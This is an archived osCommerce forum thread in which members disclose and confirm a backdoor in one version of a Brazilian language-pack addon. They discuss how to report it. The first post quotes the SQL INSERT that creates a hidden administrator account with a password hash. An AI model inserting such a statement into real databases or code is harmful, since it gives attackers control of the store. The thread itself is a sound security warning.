VictorSalechov Posted November 12, 2011 Posted November 12, 2011 Hi all, I registered just to let you know that following addon: http://addons.oscommerce.com/info/5571 , which is a Brazilian language pack, if user imports SQL file, it creates an unauthorized administrator with username Davi, hence code from the SQL_POTUGUES.sql : insert into `administrators`(`user_name`,`user_password`) values ('Davi','8a1d681975271cf1b51e950b32051276:92'); PS: oscommerce rockz :) /* I would love * to change the world * but they won't give me the * source code */ outside url's not allowed in signatures
VictorSalechov Posted November 12, 2011 Author Posted November 12, 2011 It still pisses me off, someone has imported this sql file to my database, now i have to undo it. /* I would love * to change the world * but they won't give me the * source code */ outside url's not allowed in signatures
♥kymation Posted November 12, 2011 Posted November 12, 2011 Verified. The code only exists in the 25 Nov 2008 version; the previous release is OK. The next time you see something like this, use the Report button on the Addon to report it to a moderator. Speaking of moderators, better get rid of that link in your Sig before a mod does it for you. Regards Jim See my profile for a list of my addons and ways to get support.
VictorSalechov Posted November 12, 2011 Author Posted November 12, 2011 Thanks for the info Jim. I was looking for report button, still can't fine one 0_o /* I would love * to change the world * but they won't give me the * source code */ outside url's not allowed in signatures
♥kymation Posted November 12, 2011 Posted November 12, 2011 You need to click the History tab on the addon page. The Report icon is the one to the right. You may need to be logged in; I'm not sure about that part. What makes me mad is this has been in the code for three years. Regards Jim See my profile for a list of my addons and ways to get support.
Taipo Posted November 12, 2011 Posted November 12, 2011 I think its open posting on that addon so someone may be able to upload an amended addon or at least a note to warn about the administrator insert code. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.